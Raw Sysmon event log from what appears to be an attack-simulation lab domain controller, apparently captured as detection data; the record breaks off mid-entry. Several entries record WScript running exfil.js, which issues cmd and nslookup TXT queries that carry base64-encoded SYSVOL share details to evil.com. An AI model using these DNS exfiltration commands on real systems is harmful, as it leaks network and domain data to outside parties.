10341000x8000000000000000216662Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:54.807{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216661Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:54.807{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216660Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:54.806{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216659Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:54.806{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-1902-629A-C046-000000005F02}2132C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000216658Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:54.805{2E1864BB-18E0-629A-6742-000000005F02}39762428C:\Windows\System32\WScript.exe{2E1864BB-1902-629A-C046-000000005F02}2132C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000216657Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:54.805{2E1864BB-1902-629A-C046-000000005F02}2132C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVEZXNjOiBMb2dvbiBzZXJ2ZXIgc2hhcmUg evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlnsju.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-18E0-629A-6742-000000005F02}3976C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000216656Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:54.786{2E1864BB-18E0-629A-6742-000000005F02}3976ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nljjdw.tmpMD5=FFC3044AFB570E80F372BF53DBBB8207,SHA256=F6E14FFAF6210075EB5936267DAFDA62885E6C7751665C0CB6BEB4993231BC98,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000216655Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:54.771{2E1864BB-1902-629A-BE46-000000005F02}79365104C:\Windows\system32\conhost.exe{2E1864BB-1902-629A-BF46-000000005F02}7592C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216654Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:54.755{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216653Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:54.755{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216652Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:54.755{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216651Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:54.755{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216650Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:54.755{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-1902-629A-BF46-000000005F02}7592C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000216649Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:54.755{2E1864BB-1902-629A-BD46-000000005F02}61967980C:\Windows\system32\cmd.exe{2E1864BB-1902-629A-BF46-000000005F02}7592C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000216648Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:54.768{2E1864BB-1902-629A-BF46-000000005F02}7592C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVQYXRoOiBDOlxXaW5kb3dzXFNZU1ZPTFxzeXN2b2w= evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-1902-629A-BD46-000000005F02}6196C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVQYXRoOiBDOlxXaW5kb3dzXFNZU1ZPTFxzeXN2b2w= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nljjdw.tmp 2>&1 10341000x8000000000000000216647Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:54.739{2E1864BB-E13E-6299-1000-000000005F02}3642072C:\Windows\system32\svchost.exe{2E1864BB-1902-629A-BE46-000000005F02}7936C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216646Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:54.739{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-1902-629A-BE46-000000005F02}7936C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216645Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:54.724{2E1864BB-1902-629A-BE46-000000005F02}79365104C:\Windows\system32\conhost.exe{2E1864BB-1902-629A-BD46-000000005F02}6196C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216644Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:54.708{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-1902-629A-BE46-000000005F02}7936C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000216643Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:54.708{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-1902-629A-BD46-000000005F02}6196C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000216642Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:54.708{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216641Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:54.708{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216640Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:54.708{2E1864BB-18E0-629A-6742-000000005F02}39766068C:\Windows\System32\WScript.exe{2E1864BB-1902-629A-BD46-000000005F02}6196C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216639Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:54.708{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216638Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:54.708{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000216637Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:54.709{2E1864BB-1902-629A-BD46-000000005F02}6196C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVQYXRoOiBDOlxXaW5kb3dzXFNZU1ZPTFxzeXN2b2w= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nljjdw.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-18E0-629A-6742-000000005F02}3976C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000216636Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:54.701{2E1864BB-18E0-629A-6742-000000005F02}3976ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nltawmac.tmpMD5=D1A54A6F21A90F6B3FDD9CFE56E9C930,SHA256=5C5F1828A4B86FD4EE344674F6FC0762ED42C1A295A6FDEB230A8253C2750995,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000216635Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:54.639{2E1864BB-1902-629A-BB46-000000005F02}31407772C:\Windows\system32\conhost.exe{2E1864BB-1902-629A-BC46-000000005F02}2632C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216634Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:54.623{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216633Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:54.623{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216632Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:54.623{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-1902-629A-BC46-000000005F02}2632C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000216631Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 